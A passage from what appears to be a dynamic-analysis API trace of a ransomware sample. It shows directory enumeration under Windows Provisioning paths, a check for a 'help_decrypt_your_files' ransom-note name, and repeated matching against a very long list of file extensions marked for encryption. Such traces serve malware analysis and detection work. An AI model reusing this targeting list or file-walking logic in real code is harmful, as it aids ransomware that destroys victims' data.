ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.069] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f88875, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f88875, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f88875, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_5.provxml", cAlternateFileName="PO5EBD~1.PRO")) returned 1
	[0176.069] lstrcmpW (lpString1="Power_5.provxml", lpString2="..") returned 1
	[0176.070] lstrcmpW (lpString1="Power_5.provxml", lpString2=".") returned 1
	[0176.070] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.070] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_5.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml"
	[0176.070] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml") returned 109
	[0176.070] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.070] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml") returned 0x6d
	[0176.070] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.070] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.071] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml"
	[0176.071] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_5.provxml") returned 109
	[0176.071] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.071] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.071] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.071] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.072] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x757, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_6.provxml", cAlternateFileName="PO805B~1.PRO")) returned 1
	[0176.072] lstrcmpW (lpString1="Power_6.provxml", lpString2="..") returned 1
	[0176.072] lstrcmpW (lpString1="Power_6.provxml", lpString2=".") returned 1
	[0176.072] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.072] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_6.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml"
	[0176.072] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml") returned 109
	[0176.073] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.073] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml") returned 0x6d
	[0176.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.074] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml"
	[0176.074] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_6.provxml") returned 109
	[0176.074] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.074] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.075] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.075] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 1
	[0176.075] lstrcmpW (lpString1="Power_7.provxml", lpString2="..") returned 1
	[0176.075] lstrcmpW (lpString1="Power_7.provxml", lpString2=".") returned 1
	[0176.075] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
